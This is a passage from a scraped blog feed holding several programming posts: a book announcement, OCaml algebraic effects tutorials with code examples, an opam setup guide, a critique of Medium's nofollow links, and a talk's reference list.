things I have no clue about, that still leaves a large number of topics I can cover. I am interested in UX Design, Hackers, Computer Security, Software Development, rationalism, skepticism, Free and Open Source movements, Political activism, and Technocracy, with a passing interest in several other fields such as cosmology and geek culture.\nI am not going to pick one every day and write about something new. I don’t want to write something rubbish just for the sake of writing it. I ultimately want to write because I have something to say. It doesn’t have to be unique or ground-breaking. What matters is that I want to write about it.\nA few days back someone contacted me on Facebook asking me for advice on getting started with web development. I get a lot of these queries, mostly over Facebook, email, and Quora. Our conversation went back and forth, with me suggesting resources and him getting exceedingly confused over whether he should use Codecademy or Udacity, or Coursera or something else.\nI have devoted a lot of time in my life to teaching people the nuances of these things. I have mentored many people, and acutely know the issues a beginner faces. In turn, I had an amazing mentor who taught me the importance of always learning things.\nAll of this led me to realize one fact: I have been writing a lot about Software Development. Unfortunately, a lot of it is in private emails and chat. And I wanna write more about it, on a public medium.\nSo, I’m announcing the next thing I’m working on: a book called The Joy of Software Development.
A few obligatory links:\nThe source code is available on GitHub.\nIt’s licensed under the CC BY-SA 4.0 license.\nThe canonical URL for the site is https:\u002F\u002Fjosd.captnemo.in\u002F\nIt’s hosted on the excellent GitBook platform, which automatically publishes each version as epub, mobi, and pdf as well.\nWho the target audience for the book is.\nYou can file an issue for critique on GitHub.\nAs expected, all the development, writing, and discussion on the book will happen in public, mostly on GitHub. I am writing this book because I feel it needs to be written. I don’t expect it to be published, but that won’t stop me from writing it.\nArtur Siekielski recently came across it, and wrote the following:\nThe book you’re writing looks very good! It’s filling a niche as I don’t think there are any modern books that focus on “bird’s eye view”, and I see it would be helpful for many programmers to refresh knowledge.\nThat gave me a bit of validation, as the only people who’d read it so far were my close friends.\nIf you wanna support its development, you can do one of the following:\nPoke me on twitter or email and let me know you want to read it\nSubscribe to the mailing list (I’ll send out updates there)\nWatch or Star the repo on GitHub.\nSee the CONTRIBUTING file on github for contributing to the text.\nAsking for Donations might sound weird to some. I don’t really need the money, but I think I’d get an additional sense of responsibility towards finishing it if people start giving me money. I will be donating the entire proceeds to EFF.",[],{"slug":2752,"title":2753,"link":2754,"pubDate":2755,"contentSnippet":2756,"tags":2757,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"more-effects","Pearls of Algebraic Effects and Handlers","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fmulticore\u002Feffects\u002F2015\u002F05\u002F27\u002Fmore-effects\u002F","2015-05-27T14:06:00.000Z","In the previous\npost, I\npresented a simple cooperative multithreaded scheduler written using algebraic\neffects and their handlers. Algebraic effects are, of course, useful for\nexpressing other forms of effectful computations. In this post, I will present\na series of simple examples to illustrate the utility of algebraic effects and\nhandlers in OCaml. Some of the examples presented here were borrowed from the\nexcellent paper on the Eff programming language1. All of the examples\npresented below are available\nhere.\nState\nWe can use algebraic effects to model stateful\ncomputation,\nwith the ability to retrieve (get) and update (put) the current state:\nmodule type STATE = sig\n  type t\n  val put : t -> unit\n  val get : unit -> t\n  val run : (unit -> unit) -> init:t -> unit\nend\n\n\nThe function run runs a stateful computation with the given initial state.\nHere is the implementation of the module State which provides the desired\nbehaviour:\n\n\n\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n12\n13\n14\n15\n16\n17\n\nmodule State (S : sig type t end) : STATE with type t = S.t = struct\n  type t = S.t\n\n  effect Put : t -> unit\n  let put v = perform (Put v)\n\n  effect Get : t\n  let get () = perform Get\n\n  let run f ~init =\n    let comp =\n      match f () with\n      | () -> (fun s -> ())\n      | effect (Put s') k -> (fun s -> continue k () s')\n      | effect Get k -> (fun s -> continue k s s)\n    in comp init\nend\n\n\n\n\n\nThe key idea here is that the handler converts the stateful computation to\nfunctions that accept the state.
For example, observe that if the function f\nreturns a unit value (line 13), we return a function which accepts a state\ns and returns unit. The handler for effect Get (line 15) passes the current state s\nto the continuation k. The expression continue k s returns a function that\naccepts the current state and returns unit. Since fetching the current state\ndoes not modify it, we apply this function to s, the original state. Since\nPut modifies the state (line 14), the function returned by continue k () is applied\nto the new state s'. We evaluate the computation by applying it to the initial\nstate init (line 16).\nObserve that the implementation of the handler for the stateful computation is\nsimilar to the implementation of the State\nmonad in Haskell, except\nthat in Haskell the stateful computation f would have the type\nState t (), which says that f is a stateful computation where t is the\ntype of state and () the type of the return value. Since multicore OCaml does\nnot have an effect system, f simply has type unit -> unit as opposed to\nbeing explicitly tagged with the effects being performed. While the OCaml type\nof f underspecifies the behaviour of f, it does allow you to combine various\nkinds of effects directly, without the need for monad transformer\ngymnastics2. For example, the following code snippet combines int-\nand string-typed state computations, each with its own handler:\nmodule IS = State (struct type t = int end)\nmodule SS = State (struct type t = string end)\n\nlet foo () : unit =\n  printf \"%d\\n\" (IS.get ());\n  IS.put 42;\n  printf \"%d\\n\" (IS.get ());\n  IS.put 21;\n  printf \"%d\\n\" (IS.get ());\n  SS.put \"hello\";\n  printf \"%s\\n\" (SS.get ());\n  SS.put \"world\";\n  printf \"%s\\n\" (SS.get ())\n\nlet _ = IS.run (fun () -> SS.run foo \"\") 0\n\n\nwhich prints:\n0\n42\n21\nhello\nworld\n\n\nReferences\nWe can expand upon our state example to model ML-style\nreferences:\nmodule State : sig\n    type 'a t\n\n    val ref  : 'a -> 'a t\n    val (!)  : 'a t -> 'a\n    val (:=) : 'a t -> 'a -> unit\n\n    val run  : (unit -> 'a) -> 'a\n  end = struct\n\n  type 'a t = {inj : 'a -> Univ.t; prj : Univ.t -> 'a option}\n\n  effect Ref : 'a -> 'a t\n  let ref v = perform (Ref v)\n\n  effect Read : 'a t -> 'a\n  let (!) = fun r -> perform (Read r)\n\n  effect Write : 'a t * 'a -> unit\n  let (:=) = fun r v -> perform (Write (r,v))\n\n  let run f =\n    let comp =\n      match f () with\n      | v -> (fun s -> v)\n      | effect (Ref v) k -> (fun s ->\n          let (inj, prj) = Univ.embed () in\n          let cont = continue k {inj;prj} in\n          cont (inj v::s))\n      | effect (Read {inj; prj}) k -> (fun s ->\n          match find prj s with\n          | Some v -> continue k v s\n          | None -> failwith \"Ref.run: Impossible -> ref not found\")\n      | effect (Write ({inj; prj}, v)) k -> (fun s ->\n          continue k () (inj v::s))\n    in comp []\nend\n\n\nThe idea is to represent the state as a list of universally typed values,\nreferences as a record with inject and project functions to and from universal\ntype values, assignment as appending a new value to the head of the state list, and\ndereference as linear search through the list for a matching assignment.
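For reference, here is a minimal sketch of the Univ module the handler above assumes, using the standard trick of minting a fresh exception constructor per embed, along with a plausible definition of the find helper (this is one possible encoding, not necessarily the implementation the post links to):\nmodule Univ : sig\n  type t\n  val embed : unit -> ('a -> t) * (t -> 'a option)\nend = struct\n  type t = exn\n  (* Each call to embed mints a fresh constructor, so prj only recognizes\n     values injected by its own inj. *)\n  let embed (type a) () =\n    let module M = struct exception E of a end in\n    ((fun x -> M.E x), (function M.E x -> Some x | _ -> None))\nend\n\n(* Scan the state list for the first value this reference accepts. *)\nlet rec find prj = function\n  | [] -> None\n  | x :: xs -> (match prj x with Some _ as r -> r | None -> find prj xs)\n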
The\nuniversal type\nimplementation is\ndue to Alan Frisch.\nTransactions\nWe may handle lookup and update to implement\ntransactions\nthat discard the updates to references in case an exception occurs:\n  let atomically f =\n    let comp =\n      match f () with\n      | x -> (fun _ -> x)\n      | exception e -> (fun rb -> rb (); raise e)\n      | effect (Update (r,v)) k -> (fun rb ->\n          let old_v = !r in\n          r := v;\n          continue k () (fun () -> r := old_v; rb ()))\n    in comp (fun () -> ())\n\n\nUpdating a reference builds up a rollback function that negates the effect of\nthe update. In case of an exception, the rollback function is evaluated before\nre-raising the exception. For example, in the following code snippet:\nexception Res of int\n\nlet () = atomically (fun () -> (* T0 *)\n  let r = ref 10 in\n  printf \"T0: %d\\n\" (!r);\n  try atomically (fun () -> (* T1 *)\n    r := 20;\n    r := 21;\n    printf \"T1: Before abort %d\\n\" (!r);\n    raise (Res !r);\n    printf \"T1: After abort %d\\n\" (!r);\n    r := 30)\n  with\n  | Res v -> printf \"T0: T1 aborted with %d\\n\" v;\n  printf \"T0: %d\\n\" !r)\n\n\nthe updates to reference r by transaction T1 are discarded on exception and\nthe program prints the following:\nT0: 10\nT1: Before abort 21\nT0: T1 aborted with 21\nT0: 10\n\n\nFrom Iterators to Generators\nAn iterator is a fold-function of type ('a -> unit) -> unit that iterates a\nclient function over all the elements of a data structure. A generator is a\nfunction of type unit -> 'a option that returns Some v each time the\nfunction is invoked, where v is the next element in the data structure. The\nfunction returns None if the traversal is complete. Unlike an iterator, the\ngenerator hands over control of the traversal to the client of the library.\nGabriel Scherer’s insightful article on generators, iterators, control and\ncontinuations\nnicely distinguishes, motivates and provides implementations of different kinds of\niterators and generators for binary trees. While the iterator implementation is\nobvious and straightforward, the generator implementation requires translating\nthe code to CPS style and manually performing simplifications for efficient\ntraversal. Since algebraic effect handlers give us a handle to the\ncontinuation, we can essentially derive the generator implementation from\nthe\niterator.\nLet us consider a binary tree with the following type:\ntype 'a t = Leaf | Node of 'a t * 'a * 'a t\n\n\nWe can define an iterator that traverses the tree from left to right as follows:\nlet rec iter f = function\n  | Leaf -> ()\n  | Node (l, x, r) -> iter f l; f x; iter f r\n\n\nFrom this iterator, we derive the generator as follows:\n\n\n\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n12\n13\n14\n\nlet to_gen (type a) (t : a t) =\n  let module M = struct effect Next : a -> unit end in\n  let open M in\n  let step = ref (fun () -> assert false) in\n  let first_step () =\n    try\n      iter (fun x -> perform (Next x)) t;\n      None\n    with effect (Next v) k ->\n      step := continue k;\n      Some v\n  in\n    step := first_step;\n    fun () -> !step ()\n\n\n\n\n\nAt each step of the iteration, we perform the effect Next : a -> unit (line\n7), which is handled by saving the continuation to a local reference and\nreturning the value (lines 9–11). Since the effect handlers are provided with\nthe continuation, we are able to invert the control from the library to the\nclient of the library.
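As a quick usage sketch (assuming the 'a t tree type and to_gen above), the client now pulls elements on demand instead of being called back:\nlet () =\n  let t = Node (Node (Leaf, 1, Leaf), 2, Node (Leaf, 3, Leaf)) in\n  let next = to_gen t in\n  assert (next () = Some 1);\n  assert (next () = Some 2);\n  assert (next () = Some 3);\n  (* the traversal is exhausted *)\n  assert (next () = None)\n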
This avoids the need to perform manual CPS translation.\nDirect-style asynchronous IO\nSince the effect handler has access to the continuation, we can implement\nminimal asynchronous IO in\ndirect style\nas opposed to the monadic style of asynchronous IO libraries such as Lwt and\nAsync. Our asynchronous IO library has the following interface:\nmodule type AIO = sig\n\n  val fork  : (unit -> unit) -> unit\n  val yield : unit -> unit\n\n  type file_descr = Unix.file_descr\n  type sockaddr = Unix.sockaddr\n  type msg_flag = Unix.msg_flag\n\n  val accept : file_descr -> file_descr * sockaddr\n  val recv   : file_descr -> bytes -> int -> int -> msg_flag list -> int\n  val send   : file_descr -> bytes -> int -> int -> msg_flag list -> int\n  val sleep  : float -> unit\n\n  val run : (unit -> unit) -> unit\nend\n\n\nObserve that the return types of the non-blocking functions accept,\nrecv, send and sleep are the same as those of their blocking counterparts from\nthe Unix module.\nThe asynchronous IO implementation works as follows. For each blocking action,\nif the action can be performed immediately, then it is. Otherwise, the thread\nperforming the blocking task is suspended and added to a pool of threads waiting\nto perform IO:\n(* Block until data is available to read on the socket. *)\neffect Blk_read  : file_descr -> unit\n(* Block until socket is writable. *)\neffect Blk_write : file_descr -> unit\n(* Sleep for given number of seconds. *)\neffect Sleep : float -> unit\n\nlet rec core f =\n  match f () with\n  ...\n  | effect (Blk_read fd) k ->\n      if poll_rd fd then continue k ()\n      else (Hashtbl.add read_ht fd k;\n            dequeue ())\n  | effect (Blk_write fd) k ->\n      if poll_wr fd then continue k ()\n      else (Hashtbl.add write_ht fd k;\n            dequeue ())\n  | effect (Sleep t) k ->\n        if t \u003C= 0. then continue k ()\n        else (Hashtbl.add sleep_ht (Unix.gettimeofday () +. t) k;\n              dequeue ())\n\nlet accept fd =\n  perform (Blk_read fd);\n  Unix.accept fd\n\nlet recv fd buf pos len mode =\n  perform (Blk_read fd);\n  Unix.recv fd buf pos len mode\n\nlet send fd buf pos len mode =\n  perform (Blk_write fd);\n  Unix.send fd buf pos len mode\n\n\nThe scheduler works by running all of the available threads until there are no\nmore threads to run. At this point, if there are threads that are waiting to\ncomplete an IO operation, the scheduler invokes the select() call and blocks\nuntil one of the IO actions becomes available. The scheduler then resumes those\nthreads whose IO actions are now available:\n(* When there are no threads to run, perform blocking io. *)\nlet perform_io timeout =\n  let rd_fds = Hashtbl.fold (fun fd _ acc -> fd::acc) read_ht [] in\n  let wr_fds = Hashtbl.fold (fun fd _ acc -> fd::acc) write_ht [] in\n  let rdy_rd_fds, rdy_wr_fds, _ = Unix.select rd_fds wr_fds [] timeout in\n  let rec resume ht = function\n  | [] -> ()\n  | x::xs ->\n      enqueue (Hashtbl.find ht x);\n      Hashtbl.remove ht x;\n      resume ht xs\n  in\n  resume read_ht rdy_rd_fds;\n  resume write_ht rdy_wr_fds;\n  if timeout >= 0. then ignore (wakeup (Unix.gettimeofday ())) else ();\n  dequeue ()\n\n\nThe\nprogram\nimplements a simple echo server. The server listens on localhost port 9301. It\naccepts multiple clients and echoes back to the client any data sent to the\nserver. This server is a direct-style reimplementation of the echo server found\nhere,\nwhich implements the echo server in CPS style:\n(* Repeat what the client says until the client goes away. 
*)\nlet rec echo_server sock addr =\n  try\n    let data = recv sock 1024 in\n    if String.length data > 0 then\n      (ignore (send sock data);\n       echo_server sock addr)\n    else\n      let cn = string_of_sockaddr addr in\n      (printf \"echo_server : client (%s) disconnected.\\n%!\" cn;\n       close sock)\n  with\n  | _ -> close sock\n\n\nThe echo server can be tested with a telnet client by starting the server and\non the same machine running telnet localhost 9301.\nConclusion\nThe aim of the post is to illustrate the variety of alternative programming\nparadigms that arise due to algebraic effects and handlers, and hopefully\nkindle interest in reasoning and programming with effects and handlers in\nOCaml. Algebraic effects and handlers support in OCaml is in active development\nwithin the context of multicore\nOCaml. When you find those\ninevitable bugs, please report them to the issue\ntracker.\nProgramming with Algebraic Effects and Handlers (pdf) ↩\nProgramming and Reasoning with Algebraic Effects and Dependent Types (pdf) ↩",[],{"slug":2759,"title":2760,"link":2761,"pubDate":2762,"contentSnippet":2763,"tags":2764,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"effects-multicore","Effective Concurrency with Algebraic Effects","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fmulticore\u002F2015\u002F05\u002F20\u002Feffects-multicore\u002F","2015-05-20T14:04:00.000Z","Algebraic effects and handlers provide a modular abstraction for expressing\neffectful computation, allowing the programmer to separate the expression of an\neffectful computation from its implementation. In this post, I will present an\nextension to OCaml for programming with linear algebraic effects, and\ndemonstrate its use in expressing concurrency primitives for multicore\nOCaml. The design and\nimplementation of algebraic effects for multicore OCaml is due to Leo\nWhite, Stephen Dolan and\nthe multicore team at OCaml\nLabs.\nMotivation\nMulticore-capable functional programming language implementations such as\nGlasgow Haskell Compiler,\nF#, Manticore and\nMultiMLton expose one or more\nlibraries for expressing concurrent programs. The concurrent threads of\nexecution instantiated through the library are in turn multiplexed over the\navailable cores for speed up. A common theme among such runtimes is that the\nprimitives for concurrency along with the concurrent thread scheduler is baked\ninto the runtime system. Over time, the runtime system itself tends to become a\ncomplex, monolithic piece of software, with extensive use of locks, condition\nvariables, timers, thread pools, and other arcana. As a result, it becomes\ndifficult to maintain existing concurrency libraries, let alone add new ones.\nSuch lack of malleability is particularly unfortunate as it prevents developers\nfrom experimenting with custom concurrency libraries and scheduling strategies,\npreventing innovation in the ecosystem. Our goal with this work is to provide a\nminimal set of tools with which programmers can implement new concurrency\nprimitives and schedulers as OCaml libraries.\nA Taste of Effects\nA Simple Scheduler\nLet us illustrate the algebraic effect extension in multicore OCaml by\nconstructing a concurrent round-robin scheduler with the following interface:\n(* Control operations on threads *)\nval fork  : (unit -> unit) -> unit\nval yield : unit -> unit\n(* Runs the scheduler. 
*)\nval run   : (unit -> unit) -> unit\n\n\nThe basic tenet of programming with algebraic effects is that performing an\neffectful computation is separate from its interpretation1.\nIn particular, the interpretation is dynamically chosen based on the context in\nwhich an effect is performed. In our example, spawning a new thread and\nyielding control to another are effectful actions, for which we declare the\nfollowing effects:\ntype _ eff +=\n| Fork  : (unit -> unit) -> unit eff\n| Yield : unit eff\n\n\nThe type 'a eff is the predefined extensible variant type for effects,\nwhere 'a represents the return type of performing the effect. For\nconvenience, we introduce new syntax with which the same declarations can be\nexpressed as follows:\neffect Fork  : (unit -> unit) -> unit\neffect Yield : unit\n\n\nEffects are performed using the primitive perform of type 'a eff -> 'a. We\ndefine the functions fork and yield as follows:\nlet fork f = perform (Fork f)\nlet yield () = perform Yield\n\n\nWhat is left is to provide an interpretation of what it means to perform\nfork and yield. This interpretation is provided with the help of\nhandlers.\n\n\n\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n12\n13\n14\n15\n16\n17\n18\n19\n\nlet run main =\n  let run_q = Queue.create () in\n  let enqueue k = Queue.push k run_q in\n  let rec dequeue () =\n    if Queue.is_empty run_q then ()\n    else continue (Queue.pop run_q) ()\n  in\n  let rec spawn f =\n    match f () with\n    | () -> dequeue ()\n    | exception e ->\n        print_string (to_string e);\n        dequeue ()\n    | effect Yield k ->\n        enqueue k; dequeue ()\n    | effect (Fork f) k ->\n        enqueue k; spawn f\n  in\n  spawn main\n\n\n\n\n\nThe function spawn f (line 8) evaluates f in a new thread of control. f\nmay return normally with value () or exceptionally with an exception e or\neffectfully with the effect performed along with the delimited\ncontinuation2 k. In the pattern effect e k, if the\neffect e has type 'a eff, then the delimited continuation k has type\n('a,'b) continuation, i.e., the return type of the effect 'a matches the\nargument type of the continuation, and the return type of the delimited\ncontinuation is 'b.\nObserve that we represent the scheduler queue with a queue of delimited\ncontinuations, with functions to manipulate the queue (lines 2–6). In the case\nof normal or exceptional return, we pop the scheduler queue and resume the\nresultant continuation using the continue primitive (line 6). continue k v\nresumes the continuation k : ('a,'b) continuation with value v : 'a and\nreturns a value of type 'b. In the case of an effectful return with the Fork f\neffect (lines 16–17), we enqueue the current continuation to the scheduler\nqueue and spawn a new thread of control for evaluating f. In the case of the\nYield effect (lines 14–15), we enqueue the current continuation, and resume\nsome other saved continuation from the scheduler queue.\nTesting the scheduler\nLet’s write a simple concurrent program that utilises this scheduler to create\na binary tree of tasks. The sources for this test are available\nhere. 
The program\nconcurrent.ml:\nlet log = Printf.printf\n\nlet rec f id depth =\n  log \"Starting number %i\\n%!\" id;\n  if depth > 0 then begin\n    log \"Forking number %i\\n%!\" (id * 2 + 1);\n    Sched.fork (fun () -> f (id * 2 + 1) (depth - 1));\n    log \"Forking number %i\\n%!\" (id * 2 + 2);\n    Sched.fork (fun () -> f (id * 2 + 2) (depth - 1))\n  end else begin\n    log \"Yielding in number %i\\n%!\" id;\n    Sched.yield ();\n    log \"Resumed number %i\\n%!\" id;\n  end;\n  log \"Finishing number %i\\n%!\" id\n\nlet () = Sched.run (fun () -> f 0 2)\n\n\ngenerates a binary tree of depth 2, where the tasks are numbered as shown\nbelow:\n\nThe program forks new tasks in a depth-first fashion and yields when it reaches\nmaximum depth, logging the actions along the way. To run the program, first\ninstall multicore OCaml compiler, available from the OCaml Labs dev\nrepo. Once the compiler is\ninstalled, the above test program can be compiled and run as follows:\n$ git clone https:\u002F\u002Fgithub.com\u002Fkayceesrk\u002Focaml-eff-example\n$ cd ocaml-eff-example\n$ make\n$ .\u002Fconcurrent\nStarting number 0\nForking number 1\nStarting number 1\nForking number 3\nStarting number 3\nYielding in number 3\nForking number 2\nStarting number 2\nForking number 5\nStarting number 5\nYielding in number 5\nForking number 4\nStarting number 4\nYielding in number 4\nResumed number 3\nFinishing number 3\nFinishing number 0\nForking number 6\nStarting number 6\nYielding in number 6\nResumed number 5\nFinishing number 5\nFinishing number 1\nResumed number 4\nFinishing number 4\nFinishing number 2\nResumed number 6\nFinishing number 6\n\n\nThe output illustrates how the tasks are forked and scheduled.\nImplementation\nFibers for Concurrency\nThe main challenge in the implementation of algebraic effects is the efficient\nmanagement of delimited continuations. In multicore OCaml3, the delimited\ncontinuations are implemented using fibers, which are small heap-allocated,\ndynamically resized stacks. Fibers represent the unit of concurrency in the\nruntime system.\nOur continuations are linear (one-shot)4, in that once captured,\nthey may be resumed at most once. Capturing a one-shot continuation is fast,\nsince it involves only obtaining a pointer to the underlying fiber, and\nrequires no allocation. OCaml uses a calling convention without callee-save\nregisters, so capturing a one-shot continuation requires saving no more context\nthan that necessary for a normal function call.\nSince OCaml does not have linear types, we enforce the one-shot property at\nruntime by raising an exception the second time a continuation is invoked. For\napplications requiring true multi-shot continuations (such as probabilistic\nprogramming5), we envision providing an explicit operation to copy\na continuation.\nWhile continuation based concurrent functional programming runtimes such as\nManticore and MultiMLton use undelimited continuations, our continuations are\ndelimited. We believe delimited continuations enable complex nested and\nhierarchical schedulers to be expressed more naturally due to the fact that\nthey introduce parent-child relationship between fibers similar to a function\ninvocation.\nRunning on Multiple Cores\nMulticore OCaml provides support for shared-memory parallel execution. The unit\nof parallelism is a domain, each running a separate system thread, with a\nrelatively small local heap and a single shared heap shared among all of the\ndomains. 
In order to distribute the fibers amongst the available domains, work\nsharing\u002Fstealing schedulers are initiated on each of the domains. The multicore\nruntime exposes to the programmer a small set of locking and signalling\nprimitives for achieving mutual exclusion and inter-domain communication.\nThe multicore runtime has the invariant that there are no pointers between the\ndomain local heaps. However, the programmer utilising the effect library to\nwrite schedulers need not be aware of this restriction as fibers are\ntransparently promoted from local to shared heap on demand. We will have to\nsave multicore-capable schedulers for another post.\nEff ↩\nRepresenting Monads ↩\nMulticore OCaml (pdf) ↩\nRepresenting Control in the presence of One-shot Continuations ↩\nEmbedded domain-specific language HANSEI for probabilistic models and (nested) inference ↩",[],{"slug":2766,"title":2767,"link":2768,"pubDate":2769,"contentSnippet":2770,"tags":2771,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"medium-abuses-nofollow","Medium abuses nofollow","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F04\u002F06\u002Fmedium-abuses-nofollow\u002F","2015-04-06T00:00:00.000Z","Update: Since I published this post, I have changed my opinion somewhat on the matter. This post is quite confrontational and I didn’t mean it to be that way. Medium is not wrong in this matter, but I still think we need to look for better solutions. I have since been working on a proposal\u002Fidea that would use machine learning to “solve” this problem, instead of side-stepping it.\nI call Medium a “mostly good” platform for lazy writers. A lot of people have written about its excellent typography, or it being the next “big publishing platform”. I’ve used Medium in the past, and while it does have its benefits, I have stopped using it.\nMy primary reason was that I already have a blog, where I can control the entire experience. This is the same reason why the New York Times does not start publishing articles on Medium.\nThe other reason is nofollow abuse.\nMedium hosts more than 1M indexed pages. It has around 650k users currently by a conservative estimate. Rounding that up to 700k to account for other users, collections, and other internal pages, and subtracting from the 1M indexed pages, leaves us with around 300,000 articles on Medium.\nA basic tenet of the web is linkability. That is what Tim Berners-Lee meant when he talked about HyperText:\nHyperText is a way to link and access information of various kinds as a web of nodes in which the user can browse at will.\nOver time, the web has evolved, and is now not just limited to human users, but to computers as well. This is an important consideration on which the web rests today. The biggest example of this is Google Search, which uses these links to “follow, spider, and index” the web. Google uses this linking information to build a citation index, which gives us the quality of a web page depending on the quality and number of sites that link to it.\nIf you know a thing or two about SEO, you might have heard of shady backlink techniques, which essentially amount to you getting links from an established site. This often takes the form of user-generated content such as comments and answers.\nWhile fighting spam is important, it is far more important to make sure that the web remains linked, and that people are credited for the content they create. 
Medium hosts 300,000 articles published by half a million users, and yet none of these link back to external websites, because of something called “rel=nofollow”.\nWhen a link has a rel=nofollow attribute, search engines do not count it as a citation in their index. While this may be the right strategy for comments on a WordPress blog to prevent spam, this is not the right way to move forward if you want to “revolutionize the publishing industry”.\nWhile Medium is not as bad as some other sites in this regard (like Quora, which even blocks the Internet Archive), it matters more here because Medium portrays itself as a “publishing platform”. This means Medium is made up of articles and blog posts with lots of outbound links, compared to, for instance, StackOverflow answers (which solved this problem back in 2011).\nIf you publish content on Medium, and provide relevant links for your readers, remember that these links are not considered relevant by search engines.\nMedium has said that this is not a top priority for them at the moment.\nI understand completely. Handling spam would be a far harder problem to solve than just blacklisting all outbound links. But we cannot go this way if we want an open web. We need publishing platforms that cite content, and not blacklist it. This is why I write content on my own blog, and not on Medium.",[],{"slug":2773,"title":2774,"link":2775,"pubDate":2776,"contentSnippet":2777,"tags":2778,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"opam-switch-to-multicore","Opam Switch to Multicore OCaml","https:\u002F\u002Fkcsrk.info\u002Fmulticore\u002Fopam\u002Focaml\u002F2015\u002F03\u002F25\u002Fopam-switch-to-multicore\u002F","2015-03-25T18:15:00.000Z","OPAM has a great compiler\nswitch feature that lets you\nsimultaneously host several OCaml installations, each with its own compiler\nversion and a set of installed packages. I wanted to use the power of opam\nswitch for working with the experimental multicore\nOCaml compiler. The key\nadvantage of doing this is that it lets you easily install packages from the\nOPAM repository, while sandboxing it from other OCaml\ninstallations on your system. This post will show how to create an OPAM compiler\nswitch for multicore OCaml.\nInstall opam-compiler-conf\nThe first step is to install Gabriel Scherer’s opam-compiler-conf\nscript which lets you do opam\nswitches on local installations:\n$ git clone https:\u002F\u002Fgithub.com\u002Fgasche\u002Fopam-compiler-conf\n$ cd opam-compiler-conf\n$ mkdir -p ~\u002F.local\u002Fbin\n$ make BINDIR=~\u002F.local\u002Fbin install\n\n\nThis installs the opam-compiler-conf script under ~\u002F.local\u002Fbin. Make sure\nthis directory is under your search path. Now, opam compiler-conf should\ngive you the list of available commands.\nBuild multicore OCaml locally\nTyping opam switch should list the compilers currently installed in your\nsystem and those that are available. For instance, here is my setup:\n$ opam switch\nsystem  C system  System compiler (4.02.1)\n4.02.1  I 4.02.1  Official 4.02.1 release\n4.02.0  I 4.02.0  Official 4.02.0 release\n4.01.0  I 4.01.0  Official 4.01.0 release\n--     -- 3.11.2  Official 3.11.2 release\n--     -- 3.12.1  Official 3.12.1 release\n--     -- 4.00.0  Official 4.00.0 release\n--     -- 4.00.1  Official 4.00.1 release\n# 66 more patched or experimental compilers, use '--all' to show\n\n\nYou can easily switch between the installations using opam switch\n[system-name]. 
Let us now install multicore OCaml as a new switch:\n$ git clone https:\u002F\u002Fgithub.com\u002Focamllabs\u002Focaml-multicore\n$ cd ocaml-multicore\n$ opam compiler-conf configure\n$ make world\n$ opam compiler-conf install\n$ eval `opam config env`\n\n\nThe multicore compiler is now installed and has been made the current compiler:\n$ opam switch\nsystem                      I system                      System compiler (4.02.1)\n4.02.1+local-git-multicore  C 4.02.1+local-git-multicore  Local checkout of 4.02.1 at \u002FUsers\u002Fkc\u002Focaml-multicore\n4.02.1                      I 4.02.1                      Official 4.02.1 release\n4.02.0                      I 4.02.0                      Official 4.02.0 release\n4.01.0                      I 4.01.0                      Official 4.01.0 release\n--                         -- 3.11.2                      Official 3.11.2 release\n--                         -- 3.12.1                      Official 3.12.1 release\n--                         -- 4.00.0                      Official 4.00.0 release\n--                         -- 4.00.1                      Official 4.00.1 release\n# 66 more patched or experimental compilers, use '--all' to show\n\n\nThis can be confirmed by:\n$ ocamlc -version\n4.02.1+multicore-dev0\n\n\nwhich shows the current OCaml bytecode compiler version.\nWorking with the local switch\nEvery time you change the compiler source, you need to rebuild the compiler and\nreinstall the switch:\n# Changed compiler source...\n$ make world\n$ opam compiler-conf reinstall\n\n\nThe local installation can be removed by opam compiler-conf uninstall.",[],{"slug":2780,"title":2781,"link":2782,"pubDate":2783,"contentSnippet":2784,"tags":2785,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"josd-talk","Blog post on recent talk","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F03\u002F20\u002Fjosd-talk\u002F","2015-03-20T00:00:00.000Z","So I recently did a talk on Joy of Software Development. You can read more about the talk here (link includes slides and list of topics covered). This post is devoted to the references I’d promised to link to in the talk. Since it was an introductory talk, and I didn’t want to bore people to death, I decided to cover lots of topics at a shallow depth, instead of covering a few topics deeply.\nThis means that I need to post more material for people to follow up on. So, this is that reference blog post. 
Make sure you have a copy of the slides open as you go through these links.\nUpdate: I also gave this talk (with a few updates) at GeekSkool in October 2015.\nSoftware Development in general\nHiring in software industry is broken\nBreadth First Learning\nRecommended readings for developers by Jeff Atwood (codinghorror)\nShip v1, even if it sucks\nShip early, ship often\nNever rewrite, always refactor by Joel Spolsky\nThe Joel Test to score a software company.\nSoftware Security\nSecurity is the opposite of obscurity\nOWASP Top 10\nSoftware Security course on coursera\nCTFTime - See upcoming CTF contests\nSmashTheStack - Learn buffer overflow attacks\nNebula Exploit Exercises\nBackdoor - Security CTF platform for beginners by SDSLabs\nStarting Advice\nUse bcrypt\nAsk questions on Security.SE\nPrinciple Of Least Privilege\nNever trust user input\nAgnostic Software Development\nWhat should I do to be language-agnostic?\nSeven languages in seven weeks (Book)\nRight tool for the job\nLanguage Agnostic\nBalance between “right tool for the job” and familiarity\nFree and open source development\nWhy Open Source misses the point of Free Software - by Richard Stallman\nOpen source definition\nChoose a license\nWhat is free software?\nWhy Free Software Movement is important\nMozilla mission statement\nVersion Control\nPro Git (Book)\nLearn Git in your browser\nHg Init Mercurial tutorial\nDifference between Hg and Git\nBenefits of git\nMust read post on git branching model\nGit in 20 commands\nTests\nDuring the talk, I deliberately used the term TDD incorrectly. TDD technically means going test first, but I used it as an introduction to testing in general. This was intentional. The links here will use TDD in the correct sense.\nTest Driven Development Tutorial\nWhy TDD works\nHow much to cover in tests\nImportance of testing - Jeff Atwood\nBenefits of going test first\nTesting culture at github\nSource code I used in talk\nREST and APIs\nWhy was REST a breakthrough\nA simple lucid explanation of REST\nWhat API to use\nNIH Syndrome\nUnix 